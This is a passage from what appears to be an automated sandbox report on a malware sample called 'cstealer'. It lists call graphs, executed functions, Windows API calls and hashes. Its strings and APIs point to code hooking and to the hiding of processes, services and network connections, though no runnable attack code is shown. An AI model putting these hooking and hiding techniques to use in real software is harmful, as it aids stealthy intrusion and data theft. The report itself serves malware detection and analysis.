15071->15044 15076 14e7128104c 4 API calls 15072->15076 15073->15065 15075 14e71281857 RegCloseKey 15074->15075 15075->15070 15077 14e71281892 RegCloseKey 15076->15077 15077->15071 15118 14e712814a4 15078->15118 15117 14e71296168 15095->15117 15097 14e71281283 GetProcessHeap 15098 14e712812ae _invalid_parameter_noinfo 15097->15098 15098->15036 15100 14e712810bf 15099->15100 15101 14e712811b5 RegCloseKey 15099->15101 15100->15101 15102 14e712810cf RegEnumValueW 15100->15102 15101->15049 15103 14e71281125 _invalid_parameter_noinfo __free_lconv_mon 15102->15103 15103->15101 15103->15102 15104 14e7128114e GetProcessHeap 15103->15104 15105 14e7128116e GetProcessHeap 15103->15105 15104->15103 15105->15103 15107 14e71281327 GetProcessHeap 15106->15107 15108 14e7128148a __free_lconv_mon 15106->15108 15114 14e7128133e _invalid_parameter_noinfo __free_lconv_mon 15107->15114 15108->15051 15109 14e71281476 GetProcessHeap 15109->15108 15110 14e71281352 RegEnumValueW 15110->15114 15111 14e7128152c 2 API calls 15111->15114 15112 14e7128141e lstrlenW GetProcessHeap 15112->15114 15113 14e712813d3 GetProcessHeap 15113->15114 15114->15109 15114->15110 15114->15111 15114->15112 15114->15113 15115 14e712813f3 GetProcessHeap 15114->15115 15116 14e71281443 StrCpyW 15114->15116 15115->15114 15116->15114 15119 14e712814e1 GetProcessHeap 15118->15119 15120 14e712814c1 GetProcessHeap 15118->15120 15124 14e71296180 15119->15124 15122 14e712814da __free_lconv_mon 15120->15122 15122->15119 15122->15120 15125 14e71296182 15124->15125 15126 14e71282b2c 15128 14e71282b9d 15126->15128 15127 14e71282ee0 15128->15127 15129 14e71282bc9 GetModuleHandleA 15128->15129 15130 14e71282bdb __vcrt_InitializeCriticalSectionEx 15129->15130 15130->15127 15131 14e71282c14 StrCmpNIW 15130->15131 15131->15127 15137 14e71282c39 15131->15137 15132 14e7128199c 6 API calls 15132->15137 15133 14e71282e05 lstrlenW 15133->15137 15134 14e71282d4b lstrlenW 15134->15137 15135 14e71283844 StrCmpNIW 15135->15137 15136 14e7128152c StrCmpIW StrCmpW 15136->15137 15137->15127 15137->15132 15137->15133 15137->15134 15137->15135 15137->15136 15138 14e7128202c 15139 14e7128205d 15138->15139 15140 14e7128213e 15139->15140 15141 14e71282173 15139->15141 15147 14e71282081 15139->15147 15142 14e712821e7 15141->15142 15143 14e71282178 15141->15143 15142->15140 15146 14e71282f04 7 API calls 15142->15146 15156 14e71282f04 GetProcessHeap 15143->15156 15145 14e712820b9 StrCmpNIW 15145->15147 15146->15140 15147->15140 15147->15145 15149 14e71281bf4 15147->15149 15150 14e71281c1b GetProcessHeap 15149->15150 15151 14e71281c8b __free_lconv_mon 15149->15151 15152 14e71281c41 _invalid_parameter_noinfo 15150->15152 15151->15147 15152->15151 15153 14e71281c77 GetProcessHeap 15152->15153 15154 14e7128152c 2 API calls 15152->15154 15153->15151 15155 14e71281c6e 15154->15155 15155->15153 15161 14e71282f40 _invalid_parameter_noinfo 15156->15161 15157 14e71283015 GetProcessHeap 15158 14e71283029 __free_lconv_mon 15157->15158 15158->15140 15159 14e71283010 15159->15157 15160 14e71282fa2 StrCmpNIW 15160->15161 15161->15157 15161->15159 15161->15160 15162 14e71281bf4 4 API calls 15161->15162 15162->15161 15163 14e7128554d 15165 14e71285554 15163->15165 15164 14e712855bb 15165->15164 15166 14e71285637 VirtualProtect 15165->15166 15167 14e71285671 15166->15167 15168 14e71285663 GetLastError 15166->15168 15168->15167 15169 14e71285cf0 15170 14e71285cfd 15169->15170 15171 14e71285d09 15170->15171 15178 14e71285e1a 15170->15178 15172 14e71285d3e 15171->15172 15173 14e71285d8d 15171->15173 15174 14e71285d66 SetThreadContext 15172->15174 15174->15173 15175 14e71285efe 15177 14e71285f1e 15175->15177 15191 14e712843e0 15175->15191 15176 14e71285e41 VirtualProtect FlushInstructionCache 15176->15178 15187 14e71284df0 GetCurrentProcess 15177->15187 15178->15175 15178->15176 15181 14e71285f23 15182 14e71285f77 15181->15182 15183 14e71285f37 ResumeThread 15181->15183 15195 14e71287940 15182->15195 15184 14e71285f6b 15183->15184 15184->15181 15186 14e71285fbf 15188 14e71284e0c 15187->15188 15189 14e71284e22 VirtualProtect FlushInstructionCache 15188->15189 15190 14e71284e53 15188->15190 15189->15188 15190->15181 15193 14e712843fc 15191->15193 15192 14e7128445f 15192->15177 15193->15192 15194 14e71284412 VirtualFree 15193->15194 15194->15193 15196 14e71287949 15195->15196 15197 14e71287954 15196->15197 15198 14e7128812c IsProcessorFeaturePresent 15196->15198 15197->15186 15199 14e71288144 15198->15199 15202 14e71288320 RtlCaptureContext 15199->15202 15201 14e71288157 15201->15186 15203 14e7128833a capture_previous_context 15202->15203 15203->15201 15204 14e7125273c 15205 14e7125276a 15204->15205 15206 14e712527c5 VirtualAlloc 15205->15206 15209 14e712528d4 15205->15209 15208 14e712527ec 15206->15208 15206->15209 15207 14e71252858 LoadLibraryA 15207->15208 15208->15207 15208->15209

                                                                                                                                                            Executed Functions

                                                                                                                                                            Function 0000014E71282B2C Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 264stringlibraryloaderCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 53 14e71282b2c-14e71282b97 call 14e712a2ce0 55 14e71282b9d-14e71282ba5 53->55 56 14e71282bab-14e71282bb1 55->56 57 14e71282ee0-14e71282f03 55->57 56->57 58 14e71282bb7-14e71282bba 56->58 58->57 59 14e71282bc0-14e71282bc3 58->59 59->57 60 14e71282bc9-14e71282bd9 GetModuleHandleA 59->60 61 14e71282bdb-14e71282beb call 14e71296090 60->61 62 14e71282bed 60->62 63 14e71282bf0-14e71282c0e 61->63 62->63 63->57 67 14e71282c14-14e71282c33 StrCmpNIW 63->67 67->57 68 14e71282c39-14e71282c3d 67->68 68->57 69 14e71282c43-14e71282c4d 68->69 69->57 70 14e71282c53-14e71282c5a 69->70 70->57 71 14e71282c60-14e71282c73 70->71 72 14e71282c83 71->72 73 14e71282c75-14e71282c81 71->73 74 14e71282c86-14e71282c8a 72->74 73->74 75 14e71282c9a 74->75 76 14e71282c8c-14e71282c98 74->76 77 14e71282c9d-14e71282ca7 75->77 76->77 78 14e71282d9d-14e71282da1 77->78 79 14e71282cad-14e71282cb0 77->79 82 14e71282da7-14e71282daa 78->82 83 14e71282ed2-14e71282eda 78->83 80 14e71282cc2-14e71282ccc 79->80 81 14e71282cb2-14e71282cbf call 14e7128199c 79->81 85 14e71282cce-14e71282cdb 80->85 86 14e71282d00-14e71282d0a 80->86 81->80 87 14e71282dbb-14e71282dc5 82->87 88 14e71282dac-14e71282db8 call 14e7128199c 82->88 83->57 83->71 85->86 92 14e71282cdd-14e71282cea 85->92 93 14e71282d3a-14e71282d3d 86->93 94 14e71282d0c-14e71282d19 86->94 89 14e71282dc7-14e71282dd4 87->89 90 14e71282df5-14e71282df8 87->90 88->87 89->90 96 14e71282dd6-14e71282de3 89->96 97 14e71282dfa-14e71282e03 call 14e71281bbc 90->97 98 14e71282e05-14e71282e12 lstrlenW 90->98 99 14e71282ced-14e71282cf3 92->99 101 14e71282d4b-14e71282d58 lstrlenW 93->101 102 14e71282d3f-14e71282d49 call 14e71281bbc 93->102 94->93 100 14e71282d1b-14e71282d28 94->100 104 14e71282de6-14e71282dec 96->104 97->98 115 14e71282e4a-14e71282e55 97->115 110 14e71282e14-14e71282e1e 98->110 111 14e71282e35-14e71282e3f call 14e71283844 98->111 108 14e71282cf9-14e71282cfe 99->108 109 14e71282d93-14e71282d98 99->109 112 14e71282d2b-14e71282d31 100->112 105 14e71282d5a-14e71282d64 101->105 106 14e71282d7b-14e71282d8d call 14e71283844 101->106 102->101 102->109 104->115 116 14e71282dee-14e71282df3 104->116 105->106 117 14e71282d66-14e71282d79 call 14e7128152c 105->117 106->109 120 14e71282e42-14e71282e44 106->120 108->86 108->99 109->120 110->111 121 14e71282e20-14e71282e33 call 14e7128152c 110->121 111->120 112->109 122 14e71282d33-14e71282d38 112->122 124 14e71282e57-14e71282e5b 115->124 125 14e71282ecc-14e71282ed0 115->125 116->90 116->104 117->106 117->109 120->83 120->115 121->111 121->115 122->93 122->112 130 14e71282e5d-14e71282e61 124->130 131 14e71282e63-14e71282e7d call 14e712885c0 124->131 125->83 130->131 134 14e71282e80-14e71282e83 130->134 131->134 137 14e71282ea6-14e71282ea9 134->137 138 14e71282e85-14e71282ea3 call 14e712885c0 134->138 137->125 140 14e71282eab-14e71282ec9 call 14e712885c0 137->140 138->137 140->125
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                                                                                                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                                                                                                                            • API String ID: 2119608203-3850299575
                                                                                                                                                            • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                            • Instruction ID: 0449baa6b7c5b91a90aa4db36c4b5590e382bc6fa4fc5342ba7de86cddbcf73c
                                                                                                                                                            • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                                                                                                                            • Instruction Fuzzy Hash: 93B16C76210BD086EB698FA5D4407E9F7E6F744BA6F445016EF0963BA8EB34DC40E780
                                                                                                                                                            Function 0000014E7128253C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 314 14e7128253c-14e712825c0 call 14e712a2cc0 317 14e712825c6-14e712825c9 314->317 318 14e712827d8-14e712827fb 314->318 317->318 319 14e712825cf-14e712825dd 317->319 319->318 320 14e712825e3-14e71282629 call 14e71288c60 * 3 GetFileType 319->320 327 14e7128262b-14e7128263f StrCpyW 320->327 328 14e71282641-14e7128264b call 14e71281a40 320->328 329 14e71282650-14e71282654 327->329 328->329 331 14e7128265a-14e71282673 call 14e712830a8 call 14e71283844 329->331 332 14e712826ff-14e71282704 329->332 344 14e712826aa-14e712826f4 call 14e712a2cc0 331->344 345 14e71282675-14e712826a4 call 14e712830a8 call 14e71283044 call 14e71281cac 331->345 334 14e71282707-14e7128270c 332->334 336 14e71282729 334->336 337 14e7128270e-14e71282711 334->337 340 14e7128272c-14e71282745 call 14e712830a8 call 14e71283844 336->340 337->336 339 14e71282713-14e71282716 337->339 339->336 342 14e71282718-14e7128271b 339->342 355 14e71282787-14e71282789 340->355 356 14e71282747-14e71282776 call 14e712830a8 call 14e71283044 call 14e71281cac 340->356 342->336 346 14e7128271d-14e71282720 342->346 344->318 357 14e712826fa 344->357 345->318 345->344 346->336 350 14e71282722-14e71282727 346->350 350->336 350->340 360 14e712827aa-14e712827ad 355->360 361 14e7128278b-14e712827a5 355->361 356->355 378 14e71282778-14e71282783 356->378 357->331 364 14e712827b7-14e712827ba 360->364 365 14e712827af-14e712827b5 360->365 361->334 368 14e712827bc-14e712827bf 364->368 369 14e712827d5 364->369 365->318 368->369 371 14e712827c1-14e712827c4 368->371 369->318 371->369 373 14e712827c6-14e712827c9 371->373 373->369 375 14e712827cb-14e712827ce 373->375 375->369 377 14e712827d0-14e712827d3 375->377 377->318 377->369 378->318 379 14e71282785 378->379 379->334
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileType
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3081899298-91387939
                                                                                                                                                            • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                            • Instruction ID: 340681078b854a99e46290904f109e2b17001886fd21191800217abe7b861852
                                                                                                                                                            • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                                                                                                                            • Instruction Fuzzy Hash: 8A71B3362007C186E729EEA6D8443EAF7D6F385BA6F440016DF0A53BA9DF35C545E780
                                                                                                                                                            Function 0000014E7128202C Relevance: 4.7, APIs: 1, Strings: 2, Instructions: 162COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 380 14e7128202c-14e71282057 call 14e712a2d00 382 14e7128205d-14e71282066 380->382 383 14e71282068-14e7128206c 382->383 384 14e7128206f-14e71282072 382->384 383->384 385 14e71282078-14e7128207b 384->385 386 14e71282223-14e71282243 384->386 387 14e71282081-14e71282093 385->387 388 14e71282173-14e71282176 385->388 387->386 391 14e71282099-14e712820a5 387->391 389 14e712821e7-14e712821ea 388->389 390 14e71282178-14e71282192 call 14e71282f04 388->390 389->386 395 14e712821ec-14e712821ff call 14e71282f04 389->395 390->386 400 14e71282198-14e712821ae 390->400 393 14e712820a7-14e712820b7 391->393 394 14e712820d3-14e712820de call 14e71281bbc 391->394 393->394 397 14e712820b9-14e712820d1 StrCmpNIW 393->397 401 14e712820ff-14e71282111 394->401 408 14e712820e0-14e712820f8 call 14e71281bf4 394->408 395->386 407 14e71282201-14e71282209 395->407 397->394 397->401 400->386 406 14e712821b0-14e712821cc 400->406 404 14e71282121-14e71282123 401->404 405 14e71282113-14e71282115 401->405 411 14e7128212a 404->411 412 14e71282125-14e71282128 404->412 409 14e71282117-14e7128211a 405->409 410 14e7128211c-14e7128211f 405->410 413 14e712821d0-14e712821e3 406->413 407->386 414 14e7128220b-14e71282213 407->414 408->401 420 14e712820fa-14e712820fd 408->420 416 14e7128212d-14e71282130 409->416 410->416 411->416 412->416 413->413 417 14e712821e5 413->417 418 14e71282216-14e71282221 414->418 421 14e7128213e-14e71282141 416->421 422 14e71282132-14e71282138 416->422 417->386 418->386 418->418 420->416 421->386 423 14e71282147-14e7128214b 421->423 422->391 422->421 424 14e7128214d-14e71282150 423->424 425 14e71282162-14e7128216e 423->425 424->386 426 14e71282156-14e7128215b 424->426 425->386 426->423 427 14e7128215d 426->427 427->386
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                            • String ID: S$dialer
                                                                                                                                                            • API String ID: 756756679-3873981283
                                                                                                                                                            • Opcode ID: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                                                                                            • Instruction ID: efe1027abb51890203652d4591228d1a2deddd50a22973b240ee2c69c665909d
                                                                                                                                                            • Opcode Fuzzy Hash: 10a6181ad89868b013f95f8d430f86fb0b73c76b57149a1256a42c526e771eaa
                                                                                                                                                            • Instruction Fuzzy Hash: 5451BD36B107A486EB61CFA5E8406EDF3E6F7147A5F149411DF0523BAADB35C852E380
                                                                                                                                                            Function 0000014E71281628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                            • API String ID: 106492572-2879589442
                                                                                                                                                            • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                            • Instruction ID: 3f5fbf52c7b1b0c3645f4045b5783b21f51cd5e35a97f36df7070e0be23e8575
                                                                                                                                                            • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                                                                                                            • Instruction Fuzzy Hash: 7F711636310B908AEB109F69E891699B3F6FB84BAAF001511DF4E57B79DF38C454E384
                                                                                                                                                            Function 0000014E71283790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                            • String ID: wr
                                                                                                                                                            • API String ID: 1092925422-2678910430
                                                                                                                                                            • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                            • Instruction ID: ba9ecb4d10810e6d2ec62df8c6f28dd82aeccdde71ac1d49f33606699660e33d
                                                                                                                                                            • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                                                                                                            • Instruction Fuzzy Hash: AD115E3671878182FF149B55E4046A9B2F2F748BA6F480429DF8917764EF3DC505D744
                                                                                                                                                            Function 0000014E71285B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 150 14e71285b30-14e71285b57 151 14e71285b59-14e71285b68 150->151 152 14e71285b6b-14e71285b76 GetCurrentThreadId 150->152 151->152 153 14e71285b78-14e71285b7d 152->153 154 14e71285b82-14e71285b89 152->154 155 14e71285faf-14e71285fc6 call 14e71287940 153->155 156 14e71285b9b-14e71285baf 154->156 157 14e71285b8b-14e71285b96 call 14e71285960 154->157 160 14e71285bbe-14e71285bc4 156->160 157->155 163 14e71285bca-14e71285bd3 160->163 164 14e71285c95-14e71285cb6 160->164 166 14e71285c1a-14e71285c8d call 14e71284510 call 14e712844b0 call 14e71284470 163->166 167 14e71285bd5-14e71285c18 call 14e712885c0 163->167 168 14e71285cbc-14e71285cdc GetThreadContext 164->168 169 14e71285e1f-14e71285e30 call 14e712874bf 164->169 179 14e71285c90 166->179 167->179 172 14e71285e1a 168->172 173 14e71285ce2-14e71285d03 168->173 183 14e71285e35-14e71285e3b 169->183 172->169 173->172 182 14e71285d09-14e71285d12 173->182 179->160 186 14e71285d92-14e71285da3 182->186 187 14e71285d14-14e71285d25 182->187 188 14e71285efe-14e71285f0e 183->188 189 14e71285e41-14e71285e98 VirtualProtect FlushInstructionCache 183->189 190 14e71285e15 186->190 191 14e71285da5-14e71285dc3 186->191 195 14e71285d27-14e71285d3c 187->195 196 14e71285d8d 187->196 193 14e71285f1e-14e71285f2a call 14e71284df0 188->193 194 14e71285f10-14e71285f17 188->194 197 14e71285ec9-14e71285ef9 call 14e712878ac 189->197 198 14e71285e9a-14e71285ea4 189->198 191->190 199 14e71285dc5-14e71285e10 call 14e71283900 call 14e712874dd 191->199 213 14e71285f2f-14e71285f35 193->213 194->193 201 14e71285f19 call 14e712843e0 194->201 195->196 203 14e71285d3e-14e71285d88 call 14e71283970 SetThreadContext 195->203 196->190 197->183 198->197 204 14e71285ea6-14e71285ec1 call 14e71284390 198->204 199->190 201->193 203->196 204->197 216 14e71285f77-14e71285f95 213->216 217 14e71285f37-14e71285f75 ResumeThread call 14e712878ac 213->217 218 14e71285f97-14e71285fa6 216->218 219 14e71285fa9 216->219 217->213 218->219 219->155
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Thread$Current$Context
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1666949209-0
                                                                                                                                                            • Opcode ID: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                                                            • Instruction ID: 857b95f8a502f8cec1e6dbf059a91039e77373f79ecf0731b41d074e47a49f4f
                                                                                                                                                            • Opcode Fuzzy Hash: aba7c51250b0bd2785b454d2868164715ffdc60c22b63475f1bba81942d6465a
                                                                                                                                                            • Instruction Fuzzy Hash: A5D17776204B8886DB70DB4AE49439AB7F1F388BA5F104116EB8D47BB9DF38C551DB40
                                                                                                                                                            Function 0000014E71281A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                            • String ID: \\?\
                                                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                            • Instruction ID: 56e86a83804d42a9eddd3e8b8d9409164324a6c01319e8123039a3ca364d85c2
                                                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                            • Instruction Fuzzy Hash: 85F08C723007C092EB208B65E884399F3E2F748BAAF844020CB4956AA4DA2CC68DDB44
                                                                                                                                                            Function 0000014E712850D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 227 14e712850d0-14e712850fc 228 14e7128510d-14e71285116 227->228 229 14e712850fe-14e71285106 227->229 230 14e71285127-14e71285130 228->230 231 14e71285118-14e71285120 228->231 229->228 232 14e71285141-14e7128514a 230->232 233 14e71285132-14e7128513a 230->233 231->230 234 14e71285156-14e71285161 GetCurrentThreadId 232->234 235 14e7128514c-14e71285151 232->235 233->232 237 14e7128516d-14e71285174 234->237 238 14e71285163-14e71285168 234->238 236 14e712856d3-14e712856da 235->236 239 14e71285176-14e7128517c 237->239 240 14e71285181-14e7128518a 237->240 238->236 239->236 241 14e71285196-14e712851a2 240->241 242 14e7128518c-14e71285191 240->242 243 14e712851ce-14e71285225 call 14e712856e0 * 2 241->243 244 14e712851a4-14e712851c9 241->244 242->236 249 14e71285227-14e7128522e 243->249 250 14e7128523a-14e71285243 243->250 244->236 251 14e71285236 249->251 252 14e71285230 249->252 253 14e71285255-14e7128525e 250->253 254 14e71285245-14e71285252 250->254 258 14e712852a6-14e712852aa 251->258 257 14e712852b0-14e712852b6 252->257 255 14e71285260-14e71285270 253->255 256 14e71285273-14e71285298 call 14e71287870 253->256 254->253 255->256 266 14e7128532d-14e71285342 call 14e71283cc0 256->266 267 14e7128529e 256->267 260 14e712852b8-14e712852d4 call 14e71284390 257->260 261 14e712852e5-14e712852eb 257->261 258->257 260->261 271 14e712852d6-14e712852de 260->271 264 14e712852ed-14e7128530c call 14e712878ac 261->264 265 14e71285315-14e71285328 261->265 264->265 265->236 274 14e71285351-14e7128535a 266->274 275 14e71285344-14e7128534c 266->275 267->258 271->261 276 14e7128536c-14e712853ba call 14e71288c60 274->276 277 14e7128535c-14e71285369 274->277 275->258 280 14e712853c2-14e712853ca 276->280 277->276 281 14e712854d7-14e712854df 280->281 282 14e712853d0-14e712854bb call 14e71287440 280->282 283 14e712854e1-14e712854f4 call 14e71284590 281->283 284 14e71285523-14e7128552b 281->284 294 14e712854bd 282->294 295 14e712854bf-14e712854ce call 14e71284060 282->295 299 14e712854f6 283->299 300 14e712854f8-14e71285521 283->300 287 14e71285537-14e71285546 284->287 288 14e7128552d-14e71285535 284->288 292 14e71285548 287->292 293 14e7128554f 287->293 288->287 291 14e71285554-14e71285561 288->291 297 14e71285563 291->297 298 14e71285564-14e712855b9 call 14e712885c0 291->298 292->293 293->291 294->281 303 14e712854d0 295->303 304 14e712854d2 295->304 297->298 306 14e712855c8-14e71285661 call 14e71284510 call 14e71284470 VirtualProtect 298->306 307 14e712855bb-14e712855c3 298->307 299->284 300->281 303->281 304->280 312 14e71285671-14e712856d1 306->312 313 14e71285663-14e71285668 GetLastError 306->313 312->236 313->312
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                            • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                                                            • Instruction ID: a766f5e90c36a97ebfeae0bd8a2a79f6c6d77f248dacb9c8a974e23ea2b547bd
                                                                                                                                                            • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                                                            • Instruction Fuzzy Hash: 46029436219BC486EB60CB99E49039AB7F1F3847A5F104015EB8E87BA9DF7CC494DB40
                                                                                                                                                            Function 0000014E712839E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Virtual$AllocQuery
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 31662377-0
                                                                                                                                                            • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                                                            • Instruction ID: 559246f08743b7c784e7374959e58f646513aa59f3b0a1e0d09b073a98b2edf0
                                                                                                                                                            • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                                                            • Instruction Fuzzy Hash: B2312D3261DBC481EB30DA95E05139AF6E6F3887A5F100525A7CE47BB8DF7DC1809B84
                                                                                                                                                            Function 0000014E7128328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000007.00000002.2570814288.0000014E71280000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E71280000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_7_2_14e71280000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1683269324-0
                                                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                            • Instruction ID: 270d3e70c633acf166a2e6a683a10a29327a942cddcf3bb7806f64e7349572f6
